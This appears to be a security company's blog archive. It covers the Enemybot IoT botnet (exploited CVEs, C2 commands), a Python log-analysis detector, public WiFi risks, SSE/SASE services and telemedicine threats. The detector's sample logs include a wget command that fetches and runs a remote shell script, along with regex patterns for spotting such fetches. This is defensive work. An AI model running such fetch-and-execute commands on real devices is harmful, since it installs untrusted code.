Category: Cybersecurity
Enemybot is a new botnet that conducts DDoS (Distributed Denial of Service) attacks against routers and websites. It spreads by exploiting existing vulnerabilities and ships binaries built for ARM, BSD, x64, x86 and other architectures. Enemybot was identified by FortiGuard Labs in mid-March.
This botnet is mostly based on the source code of Gafgyt, but it has been reported to borrow several modules from Mirai’s original source code. To avoid detection, Enemybot employs a number of obfuscation techniques and hides its command-and-control (C2) server on the Tor network. Enemybot spreads to other IoT devices through a variety of tactics. It attempts to gain access by logging into devices with a list of hardcoded username/password combinations, which succeeds wherever weak or default credentials are in use. By running shell commands, the bot also attempts to infect misconfigured Android devices that expose the Android Debug Bridge (ADB) port, TCP 5555. Enemybot has been observed infecting Seowon Intech and D-Link routers and abusing a previously disclosed iRZ router vulnerability.
The bot leverages a number of known, previously disclosed vulnerabilities, including:
- CVE-2020-17456, affecting SEOWON INTECH SLC-130 and SLR-120S routers.
- CVE-2018-10823, affecting older D-Link routers.
- CVE-2022-27226, affecting iRZ mobile routers.
- CVE-2022-25075 through CVE-2022-25084, affecting TOTOLINK routers; these were formerly used by the Beastmode botnet.
- CVE-2021-41773 and CVE-2021-42013, affecting Apache HTTP Server.
- CVE-2018-20062, affecting the ThinkPHP CMS.
- CVE-2017-18368, affecting Zyxel P660HN routers.
- CVE-2016-6277, affecting NETGEAR routers.
- CVE-2015-2051, affecting D-Link routers.
- CVE-2014-9118, affecting Zhone routers.
Once one of these vulnerabilities has been exploited, the bot uses the LDSERVER command to download a shell script from a URL that the C2 server updates dynamically. The script then downloads the actual Enemybot binary, built for the target device’s architecture. If the download server goes down, the botnet operators can push a new URL to the bot clients. Once installed on a device, the bot connects to its C2 server and waits for commands.
Although most of the commands relate to DDoS attacks, the malware is not limited to them. Fortinet lists the following supported commands:
- ADNS – Perform a DNS amplification attack.
- ARK – Launch an attack on ARK: Survival Evolved game servers.
- BLACKNURSE – Flood the target with ICMP “destination port unreachable” packets.
- DNS – Flood DNS servers with hardcoded DNS UDP requests.
- HOLD – Flood the target with TCP connections and keep them open for a set period.
- HTTP – Flood the target with HTTP requests.
- JUNK – Flood the target with non-zero-byte UDP packets at random intervals.
- OVH – Send custom UDP packets to OVH servers.
- STD – Flood the target with random-byte UDP packets.
- TCP – Flood the target with TCP packets carrying forged source headers.
- TLS – Carry out an SSL/TLS attack.
- UDP – Send UDP packets with forged source headers to the target.
- OVERTCP – Launch a TCP attack with randomized packet delivery intervals.
- STOP – Stop ongoing DoS attacks.
- LDSERVER – Update the exploit payload download server.
- SCANNER – Spread to additional devices via SSH/Telnet brute force and vulnerability exploitation.
- TCPOFF/TCPON – Turn the sniffer off or on for ports 80, 21, 25, 666, 1337 and 8080, probably to gather credentials.
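As an added example (not from the original post or from Fortinet’s analysis), the Python below scans constructed syslog-style lines for the propagation behaviors described above: repeated SSH/Telnet login failures from one source (the SCANNER brute-force stage), inbound connections to the ADB port 5555, and a device fetching a remote shell script (the LDSERVER download stage). The log formats, addresses and threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines in the shape a router/IoT gateway ("gw") and an
# edge firewall ("fw") might emit; these are not real captures.
SAMPLE_LOGS = """\
2022-04-13T10:01:02 gw sshd: Failed password for root from 203.0.113.7 port 51234
2022-04-13T10:01:03 gw telnetd: login failed user=admin from=203.0.113.7
2022-04-13T10:01:04 gw sshd: Failed password for admin from 203.0.113.7 port 51240
2022-04-13T10:01:05 gw telnetd: login failed user=support from=203.0.113.7
2022-04-13T10:01:06 gw sshd: Failed password for user from 203.0.113.7 port 51250
2022-04-13T10:01:07 gw sshd: Failed password for root from 203.0.113.7 port 51260
2022-04-13T10:02:10 fw kernel: IN=wan OUT= SRC=198.51.100.9 DST=192.0.2.20 PROTO=TCP DPT=5555 SYN
2022-04-13T10:03:40 gw sh: wget http://192.0.2.99/update.sh -O /tmp/update.sh
2022-04-13T10:03:41 gw sh: /tmp/update.sh
2022-04-13T10:05:00 gw sshd: Accepted publickey for ops from 192.0.2.5 port 40000
"""

# Assumed log formats: OpenSSH-style and a generic telnetd failure line.
SSH_FAIL = re.compile(r"Failed password for \S+ from (\d+\.\d+\.\d+\.\d+)")
TELNET_FAIL = re.compile(r"login failed user=\S+ from=(\d+\.\d+\.\d+\.\d+)")
# Inbound SYN on the WAN side to TCP/5555 (Android Debug Bridge).
ADB_SYN = re.compile(r"IN=wan .*SRC=(\d+\.\d+\.\d+\.\d+) .*PROTO=TCP DPT=5555")
# A shell on the device fetching a remote .sh file, as in the LDSERVER stage.
FETCH_SCRIPT = re.compile(r"\b(?:wget|curl)\b.*?(https?://\S+\.sh)\b")

BRUTE_THRESHOLD = 5  # assumed: failures from one source before alerting


def analyze(log_text, threshold=BRUTE_THRESHOLD):
    """Return a list of (alert_type, detail) tuples for the given log text."""
    fails = defaultdict(int)
    alerts = []
    for line in log_text.splitlines():
        m = SSH_FAIL.search(line) or TELNET_FAIL.search(line)
        if m:
            fails[m.group(1)] += 1  # tally per source across SSH and Telnet
            continue
        m = ADB_SYN.search(line)
        if m:
            alerts.append(("adb_exposed", m.group(1)))
            continue
        m = FETCH_SCRIPT.search(line)
        if m:
            alerts.append(("script_fetch", m.group(1)))
    for src, count in fails.items():
        if count >= threshold:
            alerts.append(("credential_bruteforce", src))
    return alerts


if __name__ == "__main__":
    for kind, detail in analyze(SAMPLE_LOGS):
        print(f"{kind}: {detail}")
```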
Preventing Botnet Attacks
Always apply the latest available software and firmware updates for your products to prevent Enemybot or any other botnet from infecting your devices and recruiting them into a DDoS botnet.
Common signs that a router may be infected with botnet malware are that it becomes unresponsive, internet speeds drop, and the device runs hotter than usual. In such a scenario, restart the router and change its passwords. It is also advisable to engage specialized cyber-security professionals to find and remove the infection.
Centex Technologies provide state-of-the-art cybersecurity and network security solutions for businesses. To know more, contact Centex Technologies at Killeen (254) 213-4740, Dallas (972) 375-9654, Atlanta (404) 994-5074, and Austin (512) 956-5454.
Free Wi-Fi access points at restaurants, airports, cafes, hotels, bookstores and retail outlets are frequently used by people to get their devices online. However, this convenience comes at a cost, and few people are aware of the dangers of using public WiFi. Learning how to defend against the risks of such networks goes a long way toward keeping the data on your devices safe.
Security Challenges of using a Public WiFi
The lack of authentication required to join the network makes free WiFi hotspots attractive to users and particularly enticing to attackers. It gives them an easy opportunity to reach unsecured devices on the same network. Instead of communicating directly with the hotspot, you may end up handing your traffic to the attacker, who then forwards it on.
On a free Wi-Fi network, an attacker may be able to see every piece of information you send over the Internet, so sensitive data such as emails, credit card numbers and even passwords might be exposed. An unencrypted WiFi connection can also be used to distribute malware: if users share files across the network, an attacker can quickly plant infected software on a machine.
Some of the well-known security challenges users face on public WiFi:
- Compromised Personal Information such as Login credentials, Financial information, Personal data, Pictures, etc.
- Advanced cyber-attacks on individuals’ devices, businesses, automobiles, smart gadgets, etc.
- MitM (Man-In-The-Middle) attacks to breach the privacy of communication.
- Network connections using weak or no secure encryption mechanisms.
- Sniffing and intercepting the network packets i.e. the communication channels breaching confidentiality.
- Distributing and injecting malware into devices and network systems.
- Hijacking the devices and networks using Public WiFi to connect to the internet.
How to prevent or reduce the damage arising from using Public WiFi
A. Transport-level SSL Security
Even users who have no VPN application for daily Internet browsing can still secure their communications. For websites that are visited regularly, or that require credentials, the “Always Use HTTPS” option should be selected. Attackers know that people reuse passwords, so a user’s login and password for some random forum may be the same as for their bank or workplace network, and they will try exactly that.
B. Keep the Public Sharing option Off
Users are advised not to share anything while using the Internet in a public place. Sharing over WiFi can be deactivated in the system settings the first time an unprotected network is joined.
C. Connecting to the Internet using VPNs
When connecting to a business network through an insecure network, such as a WiFi hotspot, a VPN (Virtual Private Network) connection is essential. Even if a hacker manages to get in the middle of the encrypted connection, the data is heavily secured. Because most hackers are looking for a quick buck, they are more likely to throw away encrypted stolen data rather than decode it.
D. Turn Off the WiFi when not in need
Even when a device is not connected to a network, its WiFi radio still exchanges frames with networks within range. Security mechanisms exist to keep this background communication from compromising the device, but it is still strongly advised to keep WiFi turned off when only working in a Word or Excel document or another offline application.
E. Follow the security guidelines provided by the Security Vendors
Even those who take all feasible measures when using public WiFi can occasionally encounter problems. Hence, it is critical to have a good Internet security program installed on the devices. These programs can scan files for malware regularly. They can also scan new files as and when they are downloaded. The best consumer security software often includes business protection features, allowing users to safeguard themselves while simultaneously protecting their servers at work.
There will come a point in every business traveler’s life when the only connection available is an insecure, free public WiFi hotspot. Being equipped with the right security solutions will help the user avoid being a victim of a cybercrime.
SSE (Security Service Edge) improves the security posture of any organization that uses cloud services. It secures access to the internet and to the various cloud services that employees use in their daily operations, and is a crucial tool in strengthening cloud and network security capabilities. SSE is usually offered as a cloud-based service, but hybrid on-premises and agent-based models are now also available. Its cloud-based components include access control and threat prevention services that protect data and applications.
How does SSE differ from SASE?
SASE (Secure Access Service Edge) combines the networking and security technologies that enable secure, fast enterprise operations in the cloud. SSE is the SASE component that bundles the essential security services, such as ZTNA (Zero Trust Network Access), CASB (Cloud Access Security Broker) and SWG (Secure Web Gateway), for enterprise networking assets. The networking component of the SASE framework is the WAN Edge Infrastructure, which focuses on establishing network connections by modifying the network infrastructure in real time. A few of the SSE security services are:
- CASB (Cloud Access Security Broker) – CASB helps businesses connect securely to their sensitive assets in the cloud. It addresses gaps in data visibility, data protection and regulatory compliance. CASB uses UEBA (User and Entity Behavior Analytics) to discover risks and threats affecting the enterprise’s cloud instances.
- SWG (Secure Web Gateway) – A checkpoint that prevents illegitimate traffic from entering an organization’s network. It sits between the user and the website to provide end-to-end protection; URL filtering and inspection for harmful content are just a few of its benefits. An SWG allows users to visit only safe, pre-approved websites, protecting them from web-based cyber risks.
- ZTNA (Zero Trust Network Access) – Zero Trust is applied in a granular, adaptive and context-aware manner. It secures private applications deployed across multiple clouds and corporate data centers, and strengthens the security perimeter through dynamic, policy-based access.
- DLP – Data Loss Prevention (DLP) tools enforce data protection and leakage-prevention rules in real time. This limits the inadvertent flow of sensitive information outside the organization.
- RBI – Remote Browser Isolation (RBI) is a robust web threat prevention technique that isolates web browsing activity. It defends users from malicious code hidden in a website by preventing that code from ever reaching the end user’s device.
- FWaaS – Firewall-as-a-Service is a cloud-hosted firewall that protects data and applications accessed over the internet. SSE uses it to collect, inspect and analyze traffic from on-prem and off-prem data centers. This provides network-wide visibility and management and ensures uniform policy enforcement across the entire cloud infrastructure.
SSE resolves the security problems posed by remote work, digitization, and cloud transition. SSE assists enterprises in the following ways:
- Security control management & administration simplification – Cloud and on-premises infrastructure is often managed with a patchwork of separate security policies, which may differ across cloud service providers and on-premises tech stacks. SSE reduces this cost and complexity by facilitating consistent policies across on-premises, cloud and remote work environments.
- VPNs to facilitate remote work – Remote employees have to use business-sensitive apps in extremely sensitive circumstances. The ZTNA feature from SSE allows for granular resource access. This allows an additional configuration that ensures specific degrees of access for each user.
- Malware threat prevention, detection, and mitigation – Many contemporary attacks utilize social engineering tactics to target a cloud provider’s capabilities. This involves imitating user behavior with authentic credentials. SSE’s SWG acts as a cyber-barrier that monitors traffic on the web as well as blocks any illegal access.
- SaaS apps access control – Security teams require entire visibility as well as control over the sensitive data stored on the cloud platforms. This includes preventing emerging threats on cloud-native attack surfaces. SSE’s CASB enables multi-mode support. This can be ensured by implementing granular regulations to monitor and limit access to authorized and unauthorized cloud services.
Organizations need secure usage, sharing and access for data that sits outside the security perimeter. SSE provides a consolidated, unified approach to data security, endpoint security, cloud security, and web and application security.
Telemedicine is the way of the future in medicine. Even before the current pandemic, telehealth had already absorbed a significant share of the medical industry’s growth potential. According to McKinsey, telehealth utilization surged from 11 percent to 46 percent after COVID, with providers seeing up to 175 times as many patients as before. With 76 percent of consumers expressing interest in telehealth, the future seems bright. Overall, McKinsey estimates that the telemedicine business has $250 billion of development potential. However, all of this expansion comes with significant hazards.
Telehealth and telemedicine businesses are the wave of the future in the healthcare industry, and they stand at the front of our COVID-accelerated future. Cybercrime targeting telemedicine has increased dramatically, and medical data breaches are increasing.
Why are telemedicine systems attractive to hackers?
Telehealth and telemedicine are among the world’s most profitable industries because of their scale. The large number of stakeholders, including clients and employees, makes the industry a prime target, and it holds one of the most prized kinds of loot for cybercriminals: patients’ PHI.
The following are a few examples of PHI (Personal Health Information):
- PII (Personally Identifiable Information) about the demographics of patients
- Patients’ medical histories, as well as the results of their various medical tests
- Information about a patient’s medical and life insurance
- Financial details of patients and their mode of payment used to pay the hospital bills
Techniques implemented by hackers to obtain PHI
In addition to the PHI-related dangers specific to the medical industry, telehealth operators face the same basic vulnerabilities as every other business. While not all telemedicine cybersecurity vulnerabilities are related to PHI, those are by far the most serious threats. To steal PHI from telehealth providers, cybercriminals exploit a number of weaknesses and employ a complex set of strategies.
Most hospitals have not strengthened the security of their cyber infrastructure. Loopholes in any company’s cyber defenses create opportunities for attackers to take control of assets and cause havoc.
Inadequate firewalls fail to block incoming viruses and malware, so attackers use insecure networks to gain access to corporate systems and devices. Flaws in authentication mechanisms let them get around password protection. Once inside, unencrypted data stored on servers is easy to steal and move out.
Medical professionals often lack the end-user security awareness needed to defend against the social engineering tactics adopted by cybercriminals. Even the best-protected cyber defense must account for human mistakes across many employee and client accounts. Users who have not been properly trained may configure insecure passwords and settings, and may be duped into compromising their own accounts through social engineering. Attackers may also gain access to physical areas and take advantage of unattended endpoints.
Targeting mission-critical hospital network infrastructure with DoS and DDoS attacks is another common and brutal technique. DDoS (Distributed Denial of Service) attacks usually target servers, ultrasound machines, ventilators and pacemakers. Cybercriminals bombard the hospital network with a continuous stream of access requests, which overwhelms the server systems and disrupts normal network operations; daily mission-critical operations are slowed or even stopped by the excess traffic. Attackers also take advantage of newly discovered flaws, often called Zero-Day vulnerabilities, and may demand a ransom before restoring normal service. The most dedicated and notorious attackers combine several attacks, exploiting numerous vulnerabilities at once.
HIPAA (Health Insurance Portability and Accountability Act)
The HIPAA (Health Insurance Portability and Accountability Act) of 1996 was created to ensure uniform security requirements for PHI and for the medical and health-related professions as a whole. It is administered and monitored by the US Department of Health and Human Services (HHS). Adhering to the specific regulations and measures that each rule requires cannot totally eliminate the hazards created by cybercrime. However, compliance is a set of procedures that minimizes vulnerabilities and mitigates hazards in the telemedicine and healthcare industries. Complying with HIPAA is not easy, and it is advisable to engage professional services. A professional cybersecurity company will help the business evaluate its information security posture, deploy the required safeguards, and handle patching so that all loopholes are closed or at least monitored. This is one of the best ways to ensure the safety and security of telemedicine systems and data.